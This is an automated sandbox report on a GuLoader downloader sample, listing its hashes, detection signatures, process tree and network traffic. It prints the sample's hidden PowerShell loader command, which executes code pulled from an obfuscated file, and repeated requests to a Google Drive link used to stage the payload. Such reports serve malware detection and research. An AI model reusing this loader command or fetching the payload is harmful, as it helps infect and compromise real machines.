Edit tour

Windows Analysis Report
beNxougDFV.exe

Overview

General Information

Sample name:	beNxougDFV.exe renamed because original name is a hash value
Original sample name:	3468b04eea8016136fe8dc5b259c22cf2088b3faa4b41f52f54ade1f0cb5078f.exe
Analysis ID:	1567517
MD5:	8a678142d7d4bd32f67a17757cc896a0
SHA1:	fa2ca787bbd87d95fba79851e1aba0000b9cfd8c
SHA256:	3468b04eea8016136fe8dc5b259c22cf2088b3faa4b41f52f54ade1f0cb5078f
Tags:	exeGuLoaderuser-adrian__luca
Infos:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Early bird code injection technique detected

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected GuLoader

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Powershell drops PE file

Queues an APC in another process (thread injection)

Suspicious powershell command line found

Writes to foreign memory regions

Abnormal high CPU Usage

Contains functionality for read data from the clipboard

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Msiexec Initiated Connection

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w10x64

beNxougDFV.exe (PID: 7728 cmdline: "C:\Users\user\Desktop\beNxougDFV.exe" MD5: 8A678142D7D4BD32F67A17757CC896A0)

powershell.exe (PID: 1352 cmdline: "powershell.exe" -windowstyle hidden "$Goniac=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Specialeffektens.San246';$Floragraferedes=$Goniac.SubString(53737,3);.$Floragraferedes($Goniac)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 7252 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.2594806253.00000000084FA000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Signatures

System Summary

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 172.217.19.174, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7252, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49893

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1352, TargetFilename: C:\Users\user\AppData\Local\unshabbily\beNxougDFV.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Goniac=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Specialeffektens.San246';$Floragraferedes=$Goniac.SubString(53737,3);.$Floragraferedes($Goniac)", CommandLine: "powershell.exe" -windowstyle hidden "$Goniac=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Specialeffektens.San246';$Floragraferedes=$Goniac.SubString(53737,3);.$Floragraferedes($Goniac)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\beNxougDFV.exe", ParentImage: C:\Users\user\Desktop\beNxougDFV.exe, ParentProcessId: 7728, ParentProcessName: beNxougDFV.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Goniac=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Specialeffektens.San246';$Floragraferedes=$Goniac.SubString(53737,3);.$Floragraferedes($Goniac)", ProcessId: 1352, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-03T16:42:16.487474+0100	2803270	2	Potentially Bad Traffic	192.168.2.10	49893	172.217.19.174	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: beNxougDFV.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\unshabbily\beNxougDFV.exe

Avira: detection malicious, Label: TR/AVI.Agent.ennqy

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\unshabbily\beNxougDFV.exe

ReversingLabs: Detection: 50%

Multi AV Scanner detection for submitted file

Source: beNxougDFV.exe

ReversingLabs: Detection: 50%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Source: beNxougDFV.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.10:49893 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.10:49902 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.10:49908 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.10:49923 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.10:49930 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.10:49937 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.10:49952 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.10:49973 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.10:49977 version: TLS 1.2

Source: beNxougDFV.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\beNxougDFV.exe	Code function: 0_2_00406232 FindFirstFileA,FindClose,	0_2_00406232
Source: C:\Users\user\Desktop\beNxougDFV.exe	Code function: 0_2_004056F7 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_004056F7
Source: C:\Users\user\Desktop\beNxougDFV.exe	Code function: 0_2_004026F8 FindFirstFileA,	0_2_004026F8

Source: C:\Users\user\Desktop\beNxougDFV.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\beNxougDFV.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\beNxougDFV.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates	Jump to behavior
Source: C:\Users\user\Desktop\beNxougDFV.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\beNxougDFV.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\beNxougDFV.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.10:49893 -> 172.217.19.174:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
Source: global traffic	HTTP traffic detected: GET /download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
Source: global traffic	HTTP traffic detected: GET /download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
Source: global traffic	HTTP traffic detected: GET /download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
Source: global traffic	HTTP traffic detected: GET /download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
Source: global traffic	HTTP traffic detected: GET /download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
Source: global traffic	HTTP traffic detected: GET /download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
Source: global traffic	HTTP traffic detected: GET /download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
Source: global traffic	HTTP traffic detected: GET /download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
Source: global traffic	HTTP traffic detected: GET /download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
Source: global traffic	HTTP traffic detected: GET /download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 15:42:18 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'nonce-TFpLPA0WypS0dwviuLEwkw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC7oyf3B5RRcR_my8haiXXmYfXG8_TpZwm3qMJpfW6YDlEmL3rvvM0n5ovD3NXSRxA5DD8ZyPEaZhAServer: UploadServerSet-Cookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa; expires=Wed, 04-Jun-2025 15:42:18 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 15:42:24 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-aIyapcr214F2SYZ0CBv6-Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC7yzxybbGQHdixWirF587o9euFwz36lAMnT78Aq46znOo8kWsbvdna8PbAxHrHqCKqzbQxoQ6ez5wServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 15:42:30 GMTContent-Security-Policy: script-src 'nonce-gCDCwilFQJroLZxYcCAMiQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, 